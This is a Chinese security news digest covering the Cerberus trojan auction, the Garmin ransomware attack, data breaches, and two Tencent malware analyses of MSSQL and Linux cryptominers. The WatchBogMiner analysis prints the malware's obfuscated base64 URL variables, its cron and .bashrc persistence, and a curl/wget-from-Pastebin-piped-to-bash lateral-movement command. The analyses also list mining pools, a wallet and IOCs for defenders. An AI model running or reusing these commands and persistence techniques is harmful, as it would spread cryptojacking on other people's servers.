安全快讯Top News

Cerberus 恶意软件团队解散,10 万美元拍卖源代码

据 Bleeping Computer 消息,由于开发团队的解散,Cerberus 银行木马的维护者正在拍卖整个项目,起价为 50,000 美元,最终或将以双倍的价格完成交易。拍卖包括从源代码到客户清单的所有内容、以及安装指南和使组件协同工作的脚本。 Cerberus 银行木马是一款专门针对安卓系统的恶意软件,首次出现于 2019 年 6 月。本月初,Cerberus 在 Google Play 商店中被发现,彼时其已经绕过了 Google 的应用程序保护措施。Cerberus 具有广泛的功能,能够欺骗设备上存在的银行服务通知,提示受害者输入登录凭证;并窃取双因素验证码,运行任何已安装的应用程序。 为了吸引潜在的竞标者,卖家在该帖子中声称,此 Android 恶意软件每月可产生 10,000 美元的利润。与 Cerberus 维护者达成协议的买方将获得恶意 APK 的源代码以及模块、管理面板和服务器。公告提到,Cerberus 的团队已经解散,无法提供 7×24 小时的技术支持,所以打算连同服务器一块卖掉,让其他人来进行运营。 同时,卖方还展示了 Cerberus 可用的所有功能: 对此,网络犯罪情报公司 Hudson Rock 的首席技术官 Alon Gal 则表示,像 Cerberus 这样的恶意软件的标价为 100,000 美元,很可能会吸引一些有能力维护和改进该项目的居心不良者。     (稿源:开源中国,封面源自网络。)

数万台 MSSQL 服务器遭爆破入侵,已沦为门罗币矿机

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/znFP8IjcC3KIuPfsm_93oA     一、概述 腾讯安全威胁情报中心检测到针对MS SQL服务器攻击的挖矿木马,该挖矿木马主要针对MS SQL服务进行爆破弱口令攻击,爆破成功后会植入门罗币挖矿木马进行挖矿。同时攻击者下载frpc内网穿透工具安装后门,并会添加用户以方便入侵者远程登录该服务器。 从挖矿木马的HFS服务器计数看,已有上万台MS SQL服务器被植入挖矿木马,另有数十台服务器被安装后门。攻击者在失陷服务器上安装内网穿透工具会进一步增加黑客入侵风险,企业数据库服务器沦陷会导致严重信息泄露事件发生。 腾讯安全专家建议企业在所有服务器上避免使用弱口令,爆破攻击通常是黑客试水的第一步,使用弱口令非常容易导致企业资产被入侵。腾讯T-Sec终端安全管理系统(御点)已可拦截查杀该挖矿木马。 腾讯安全旗下安全产品已针对该挖矿木马的入侵行为进行检测和拦截,具体响应清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)该木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1) 腾讯云镜支持Mssql弱密码检测; 2)腾讯云镜支持查杀该挖矿木马。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Cloud Workload Protection,CWP) 1)腾讯漏洞扫描服务已支持监测全网资产是否受MSSQL弱密码影响。 关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯漏洞扫描服务等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)对利用mssql爆破入侵的相关协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)查杀该团伙入侵释放的挖矿程序,内网端口映射工具; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 二、样本分析 该黑产团伙对mssql服务器进行爆破成功后,会下载执行HFS服务器上的恶意文件,从下载量来看,受感染的服务器有数万台,被植入后门的服务器有数十台,挖矿木马HFS文件列表如下: Adduser.exe,添加后门账户,用于后续远程登陆。 SQL.exe执行后释放4个文件到c:\windows\Fonts目录中 c:\windows\Fonts\Csrss.exe是NSSM服务封装程序,用于将sqlwriters.exe注册为服务,服务名为SQLServer Sqlwrites.exe是基于xmrig 6.2的挖矿程序 矿池: xmr.hex7e4.ru:3333 d2pool.ddns.net:3333 xmr.hex7e4.ru:3333 d2pool.ddns.net:3333 Frp_C.exe执行后释放以下文件到c:\windows\Fonts中 Dllhost.exe是一款开源的内网穿透工具Frpc,Bat负责生成frpc配置文件,以及设置服务启动项,目的是将本机的3389端口暴露给黑客服务器frp.hex7e4.ru,黑客可直接通过RDP连接到受害服务器,进而控制企业内网。 IOCs Doamin xxx.hex7e4.ru xmr.hex7e4.ru d3d.hex7e4.ru IP 43.229.149.62 185.212.128.180 URLs hxxp://43.229.149.62:8080/web/Add.exe hxxp://43.229.149.62:8080/web/AddUser.exe hxxp://43.229.149.62:8080/web/dw.exe hxxp://43.229.149.62:8080/web/Frp_C.exe hxxp://43.229.149.62:8080/web/frpc.exe hxxp://43.229.149.62:8080/web/frpc.ini hxxp://43.229.149.62:8080/web/po.jpg hxxp://43.229.149.62:8080/web/se.jpg hxxp://43.229.149.62:8080/web/SQL.exe hxxp://43.229.149.62:8080/web/sqlwriters.jpg hxxp://43.229.149.62:8080/web/sqlwriters1.jpg hxxp://43.229.149.62:8080/web/xx.txt hxxp://43.229.149.62:8080/web/xxx.txt MD5 9a745dc59585a5ad76fee0867acd1427 statr.bat 301257a23e2cad9da915cd942c833146 sqlwriters.exe 9a22fe62ebad16edc5c489c9493a5882 Frp_C.exe 88527fecde10ca426680d5baf6b384d1 po.jpg e27ba54c177c891ad3077de230813373 xxx.txt 2176ecfe4d91964ffec346dd1527420d xx.txt f457a5f0472e309c574795ca339ab566 sql.exe

Facebook 成功阻止欧盟反垄断数据要求:伤及用户隐私

北京时间7月28日下午消息,Facebook今日赢得了一项法院命令,要求欧盟暂时停止向Facebook索取更多数据。Facebook认为,这些数据包括反垄断调查不需要的高度敏感的个人信息。 位于卢森堡的欧盟中级法院“综合法院”(General Court)今日裁定,在举行全面的听证会之前,欧盟需暂时停止向Facebook索取更多数据。分析人士称,综合法院的这项裁定,可能会挫败欧盟欧盟委员会调查Facebook的相关努力。 自去年以来,Facebook一直面临着欧盟委员会的审查,其中一项调查的重点是其海量数据,另一项调查则重点针对其在2016年推出的在线市场平台,70个国家的8亿用户使用这个平台买卖商品。 到目前为止,Facebook已向欧盟委员会提供了31.5万份文件,总计约170万页。但7月15日,Facebook对欧盟委员会提起起诉,称后者在调查Facebook时所要的数据过于宽泛,已经超出了必要的范围,可能伤害用户隐私。 Facebook副总法律顾问蒂姆·兰姆(Tim Lamb)称:“欧盟委员会要求获得的信息异常广泛,这意味着我们将被要求交出与其调查无关的文件,其中包括高度敏感的个人信息,如员工的医疗信息、个人财务文件以及员工家属的私人信息等。”(李明)     (稿源:新浪科技,封面源自网络。)

基础架构配置不当致数十家企业资料库源码在互联网上裸奔

开发者兼逆向工程师 Tillie Kottmann 通过近期收集的资料发现:由于基础架构上的配置不当,来自科技、金融、零售、视频、电商、制造等行业的数十家企业的公开资料库的源代码已在网络上被曝光。公共存储库中的泄露代码,已波及微软、Adobe、联想、AMD、高通、摩托罗拉、海思(华为旗下)、联发科、GE 家电、任天堂、Roblox、迪士尼、江森自控等知名企业。 借助开发人员工具,Tillie Kottmann 收集到了上述各种泄露源码。即便有些被标记为“机密和专有”,还是可以在 GitLab 等代码托管和公共存储库平台上被大量找到。 专注于银行业威胁与欺诈事件研究的 Bank Security 指出,库中包含了来自 50 多家企业的源码。虽然不是所有文件夹都被曝光,但某些情况下还是泄露了敏感的凭据。 由 Kottmann 分享的截图可知,本次事件波及金融科技(Fiserv、Buczy Payments、Mercury Trade Finance Solutions),银行(Banca Nazionale del Lavoro),身份与访问管理(Pirean Access:One),以及游戏等行业。     (稿源:cnBeta,封面源自网络。)

Garmin 被要求支付 1 千万美元赎金 俄罗斯黑客可能是幕后黑手

Garmin在上周四遭遇勒索软件攻击,导致其服务中断,Garmin目前仍在努力恢复服务。现在更多的信息已经显示出谁应该对整个事件负责。Garmin在五天前承认了遭遇黑客袭击,Garmin在Twitter上的一个模糊的公告中解释说,它正在经历一次服务中断,公司正在努力修复它。 Garmin表示,目前正在经历一次故障,影响Garmin.com和Garmin Connect。这次中断也影响了呼叫中心,服务人员目前无法接收任何电话、电子邮件或在线聊天服务。Garmin正在努力尽快解决这个问题,并对由此带来的不便表示歉意。根据各种报道,Garmin内部宣布在部分工厂进行两天的维护,可能是为了在攻击后恢复。该公司从未证实勒索软件攻击是造成此次故障的原因。不过,来自《每日邮报》的报道显示,Garmin被要求支付1000万美元的赎金来解锁电脑,勒索软件感染会对设备上的所有文件进行加密,受害者需要支付赎金才能解密。 不用说,Garmin表示拒绝,据信该公司现在正在努力恢复备份,使所有服务重新上线。但事实证明,即使Garmin同意支付,这种事情也是不可能的,这是因为这次攻击背后的黑客组织据信是Evil Corp,这是一个俄罗斯组织,此前曾与多个针对美国银行系统的恶意行动有关。去年,美国财政部正式宣布了对Evil Corp的一系列制裁,所以在法律上,Garmin是不允许向该组织支付任何款项的。 Evil Corp的幕后黑手是Maksim Yakubets,他是一名33岁的黑客,FBI悬赏500万美元,据信他最近还对其他数十家美国公司发动了大规模攻击。据相关消息人士透露,Yakubets目前仍居住在俄罗斯,他通过恶意活动发家致富,他是著名的兰博基尼Huracan车主。他此前购买了一只老虎作为自己的宠物,并在车上使用了一个写着 “小偷 “的定制号牌。截至目前,Garmin服务仍处于瘫痪状态,该公司拒绝对任何有关勒索软件攻击的说法发表评论。     (稿源:cnBeta,封面源自网络。)

报告称美国地方选举官员的电子邮件可能受到网络钓鱼攻击的影响

根据《华尔街日报》的一份新报告,美国各地的许多选举官员正在使用的电子邮件系统可能使他们更容易受到网络钓鱼攻击的影响。Area 1 Security发现,在美国1万个州和地方选举管理机构中,只有不到20%的机构具备先进的反钓鱼控制措施,其中约666名选举官员依靠个人电子邮件地址处理选举相关事务。 据报道,几个州的司法机构正在使用一个版本的免费Exim软件,而俄罗斯GRU情报部门从2019年开始针对该软件进行在线攻击。不过,安全专家称,电子邮件安全薄弱不太可能导致选票被黑客攻击,因为电子邮件系统并没有连接到计票的系统。 但这引发了人们的担忧,即地方选举官员可能对电子邮件系统可能遭到的入侵准备不足。2016年,GRU被指控窃取和泄露希拉里-克林顿总统竞选团队的电子邮件;2018年,GRU曾注册了似乎是伪造政府网址的网络域名,表面上是为了钓鱼的目的。微软在官方认为造成任何损失之前就查封了这些域名。 而据报道,今年已经有外国黑客瞄准了为民主党推定候选人乔-拜登和特朗普总统的竞选活动工作的工作人员的个人电子邮件账户。例如据称伊朗黑客将目标对准了特朗普竞选团队工作人员的电子邮件。报告这些企图的谷歌上个月表示,没有看到这些攻击成功的证据。     (稿源:cnBeta,封面源自网络。)

科技独角兽 Dave 承认其安全漏洞影响超 750 万用户

据外媒ZDNet报道,数字银行应用和科技独角兽Dave.com周日证实了一个安全漏洞,此前有黑客在公共论坛上公布了7516625名用户的详细资料。在周日致ZDNet的一封电子邮件中,Dave表示,安全漏洞源于前商业合作伙伴Waydev的网络,Waydev是一个工程团队使用的分析平台。 “由于Waydev(Dave的前第三方服务提供商之一)的漏洞,最近有恶意方未经授权访问了Dave的某些用户数据。”一位发言人告诉ZDNet。 该公司表示,已经堵住了黑客的入口点,并正在通知客户该事件。Dave应用密码被曝光后,也正在重新设置。Dave发言人称:“当Dave意识到这一事件后,公司立即启动了调查,调查正在进行中,并正在与执法部门协调,包括与FBI协调,围绕恶意方声称已经‘破解’了其中一些密码,并试图出售Dave客户数据。” 该公司还邀请了网络安全公司CrowdStrike协助调查。 ZDNet于7月25日凌晨得知了这一安全漏洞。有读者向ZDNet爆料称,有黑客在RAID上提供Dave应用的用户数据,该论坛以黑客泄露数据库的首选之地而闻名。这名黑客“ShinyHunters”也曾入侵和泄露/出售许多其他公司的数据,包括Mathway、Tokopedia、Wishbone等。 Dave数据目前以免费下载的形式提供–在论坛成员使用论坛积分解锁下载链接后。该数据包括丰富的信息,如真实姓名、电话号码、电子邮件、出生日期和家庭地址。数据中还包括社会安全号码,但Dave表示这些细节都被加密了–ZDNet在获得数据副本后证实了这一点。 密码也包括在内,但使用bcrypt进行了散列,这种散列功能可以防止黑客查看明文密码。Dave表示,目前,他们没有证据表明黑客利用这些数据访问用户账户并执行任何未经授权的行动。     (稿源:cnBeta,封面源自网络。)

Garmin Connect 服务在遭受勒索软件攻击后下线

Garmin地图和导航服务所在的公司遭到了勒索软件的攻击,攻击者加密了这家智能手表制造商的内部服务器,迫使其关闭了呼叫中心、网站和Garmin Connect服务,而所有的Garmin地图用户几乎都依靠该服务通过移动应用同步他们的活动。 在Twitter上分享的消息中,该公司向用户道歉,并详细介绍了不同服务被迫关闭的严重程度。 据ZDNet报道,此次攻击还影响到了Garmin的航空数据库服务,即支持航空导航设备的flyGarmin,甚至是位于亚洲的一些生产线。 Garmin官方并未将此次故障归结为勒索软件攻击所致,但公司员工此后在Twitter上将其描述为勒索软件攻击。 台湾科技新闻网站IThome公布了一份Garmin的IT部门给其台湾工厂的内部备忘录,宣布周五和周六两天进行维护,消息人士告诉网站,这是由于 “病毒”造成的。     (稿源:cnBeta,封面源自网络。)  

逾千名 Twitter 员工拥有内部权限:可协助黑客入侵帐号

新浪科技讯 北京时间7月23日早间消息,据外媒报道,两位Twitter前员工透露,截至今年早些时候,共有1000多名Twitter员工和承包商可以使用内部工具更改用户帐号设置,并将控制权提供给他人。这使得防范上周的大规模黑客攻击变得更加困难。 Twitter和美国联邦调查局正在调查这起黑客入侵案件。在此次入侵中,黑客可以反复通过认证帐号发送推文,其中包括美国民主党总统候选人乔·拜登(Joe Biden)和亿万富豪比尔·盖茨(Bill Gates)等。 Twitter上周六表示,黑客“操纵了少量员工帐户,使用他们的证书”登录了工具,并获取了45个帐号的权限。他们还在周三表示,黑客可以读取36个帐号的私信,但并未披露具体受影响的帐号。 熟悉Twitter安全政策的前员工表示,有很多人具备这种权限,截至2020年早些时候甚至超过1000人,其中也包括高知特等承包商。 Twitter拒绝对这一数字发表评论,也不肯透露具体数字是否在此次被黑事件发生前有所下降。但该公司表示,他们正在物色新的安全主管,希望加强系统安全,并培训员工防范外部攻击。 高知特也未对此置评。(樵夫)     (稿源:新浪科技,封面源自网络。)

WatchBogMiner 木马发起漏洞攻击,已控制上万台 Linux 服务器挖矿

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/5bt4XtP2NNFssl7QbF2S0Q   一、背景 腾讯安全威胁情报中心检测到针对Linux服务器进行攻击的WatchBogMiner变种挖矿木马。该木马利用Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件的远程代码执行漏洞进行攻击,在失陷机器安装多种类型的持久化攻击代码,然后植入门罗币挖矿木马进行挖矿,腾讯安全专家根据木马使用的算力资源推测已有上万台Linux服务器被黑客控制。 木马通过第三方网站Pastebin保存恶意代码以躲避检测,并且通过各类方法进行持久化,定期拉取挖矿木马加载到内存执行,同时会在启动后删除木马文件以达到“隐身”目的。和其他挖矿木马类似,WatchBogMiner木马挖矿时,会清除其他挖矿木马以独占服务器。 WatchBogMiner变种攻击代码还会通过失陷机器已认证过的SSH RSA进行SSH连接和执行远程命令进行横向移动,以扩大其影响范围。根据其钱包算力(120Kh/s)推测,木马已控制约1万台服务器进行挖矿。 腾讯安全专家建议企业网管对Linux服务器进行安全检测,及时清除挖矿木马,及时修复服务器组件存在的高危漏洞,避免遭遇更严重的损失,检测方案可参考腾讯安全系列产品应对WatchBogMiner挖矿木马的响应清单进行: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)WatchBogMiner黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)WatchBogMiner黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)WatchBogMiner关联的IOCs已支持识别检测; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀WatchBogMiner相关木马程序; 2)已支持Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)检测 ; 3)已支持Supervisord远程命令执行漏洞(CVE-2017-11610)检测; 4)已支持ThinkPHP远程命令执行漏洞检测。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 (Vulnerability Scan Service,VSS) 1)腾讯VSS已支持检测全网资产是否存在Nexus Repository Manager、Supervisord、ThinkPHP等服务器组件高危漏洞; 关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)通过协议检测WatchBogMiner木马与服务器的网络通信; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀WatchBogMiner团伙入侵释放的木马程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、样本分析 WatchBogMiner使用Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)、Supervisord远程命令执行漏洞(CVE-2017-11610)、ThinkPHP远程命令执行漏洞的EXP代码对服务器进行扫描和攻击,并通过Payload执行https[:]//pastebin.com/raw/1eDKHr4r。失陷机器被安装的恶意定时任务如下: 为逃避检测,攻击者使用第三方网站Pastebin来保存恶意代码,该网站不会被网络防御方判断为恶意网站。WatchBogMiner变种用于存放恶意代码的Pastebin账号为”LISTTIME”,创建于2020年4月20日。 https[:]//pastebin.com/raw/1eDKHr4r跳转https[:]//pastebin.com/raw/UhUmR517 “UhUmR517”上保存的内容经过base64解码后,会得到以下shell脚本,包括有system()、cronhigh()、gettarfile()、download()、testa()、kill_miner_proc()等函数,会完成持久化、挖矿、横向移动等功能,是该病毒的主要攻击脚本。 脚本首先定义了4个变量,内容分别如下: house=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzFlREtIcjRy|base64 -d) park=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2I1eDFwUnpL|base64 -d) beam=$(echo c2FkYW42NjYueHl6OjkwODAvcnI=|base64 -d) deep=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1NqaldldlRz|base64 -d) surf=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3R5am5UUVRB|base64 -d) 经过base64解码后: house= https[:]//pastebin.com/raw/1eDKHr4r park= https[:]//pastebin.com/raw/b5x1pRzK beam= sadan666.xyz:9080/rr deep= https[:]//pastebin.com/raw/SjjWevTs surf= https[:]//pastebin.com/raw/tyjnTQTA 其中house、park、beam都会跳转得到“UhUmR517”脚本,而deep、surf会返回函数名“dragon”和“lossl”。 持久化模块通过多种方式定期执行远程shell脚本:1.system()函数通过写入/etc/crontab文件,创建定时任务。 2.cronhigh()通过写入以下文件创建定时任务。 /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/apache /etc/cron.d/root /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 3.cronlow()通过crontab命令创建定时任务。 4.cronbackup()通过at命令:echo “$pay” | at -m now + 1 minute添加定时任务,通过后台隐藏执行一段带有while循环的脚本:”while true; do sleep 600 && $pay; done”,同样达到定时任务效果。 5.cronc()通过写入环境变量文件”/home/$me/.bashrc”、”/root/.bashrc”执行定时任务。 挖矿模块为download()和testa(),分别从https[:]//pastebin.com/raw/GMdeWqec、 https[:]//pastebin.com/raw/Esctfgrx下载$mi_64和$st_64,经过解码后得到XMRig、xmr-stak修改而成的挖矿程序,保存为: /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/javaUpDates(最初被发现时该文件名为watchbog) 然后从https[:]//pastebin.com/raw/SB0TYBvG下载得到挖矿配置文件。 矿池:pool.minexmr.com:80 钱包: 48S8kPXdSgubJYsMhpRTr4Ct1nznDzV9ohNMEbmKzgeJLwWPV2QfKzsNRDYoxWWMAdTW69EVBhRQuFr7BiCsMQoU9xAKW4U 对比新版和旧版的挖矿木马启动代码,发现新版代码在释放和启动挖矿木马之后,会sleep 15秒,然后通过rm -rf 命令将挖矿木马文件删除。 由于Linux系统进程启动时,会将文件完全映射到内存中,所以启动之后删除文件不影响已经在运行中的进程,木马用这一方法来抹掉文件痕迹从而达到隐身。木马已通过各类持久化任务定期拉取挖矿木马并加载到内存执行,即使每次执行后删除文件,也能达到挖矿进程长期驻留系统的效果。 该钱包目前挖矿获得门罗币28XMR,折合人民币13600元,矿池算力维持在120kH/s左右,这意味着持续有1万台左右的服务器被控制挖矿。 脚本还会通过Kill_miner_proc()找到并清除竞品挖矿木马。 通过Kill_sus_proc()杀死高占用CPU的可疑进程。 变种新增横向移动模块,获取/root/.ssh/known_hosts中保存的已通过SSH RSA公钥认证的IP,重新进行SSH登陆并执行远程命令进行内网扩散攻击: curl -fsSL https[:]//pastebin.com/raw/UhUmR517||wget -q -O – https[:]//pastebin.com/raw/UhUmR517)|base64 -d|bash >/dev/null 2>&1 & 三、手动清除建议: 1、 检查是否有高CPU占用的进程javaUpDates,kill掉该进程: 映像文件路径(可能已被删除):/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/javaUpDates 2、检查以下文件是否有包含“sadan666.xyz:9080/rr”的定时任务,如有将其删除: /etc/crontab /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/apache /etc/cron.d/root /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 同时通过crontab命令检查有无“sadan666.xyz:9080/rr”相关定时任务,如有将其删除。 3、通过atq命令查找at任务队列,删除“sadan666.xyz:9080/rr”相关作业。 4、检查是否存在进程/tmp/crun,如果该进程每10分钟请求一次 “sadan666.xyz:9080/rr”,Kill掉该进程。 5、检查配置文件”/home/$me/.bashrc”、”/root/.bashrc”是否包含“sadan666.xyz:9080/rr”相关内容,如有将其删除。 IOCs Domain sadan666.xyz IP 104.236.66.189 URL https[:]//pastebin.com/raw/1eDKHr4r https[:]//pastebin.com/raw/UhUmR517 https[:]//pastebin.com/raw/b5x1pRzK http[:]//sadan666.xyz:9080/rr https[:]//pastebin.com/raw/SjjWevTs https[:]//pastebin.com/raw/tyjnTQTA https[:]//pastebin.com/raw/Esctfgrx https[:]//pastebin.com/raw/GMdeWqec https[:]//pastebin.com/raw/SB0TYBvG https[:]//pastebin.com/raw/Zkz0d9Jz https[:]//pastebin.com/raw/mvSEGmR6 md5 mi_64 88b658853b9ececc48f5cac2b7b3f6f6 st_64 ad17226de6cc93977fb7c22c7a27ea8e 钱包: 48S8kPXdSgubJYsMhpRTr4Ct1nznDzV9ohNMEbmKzgeJLwWPV2QfKzsNRDYoxWWMAdTW69EVBhRQuFr7BiCsMQoU9xAKW4U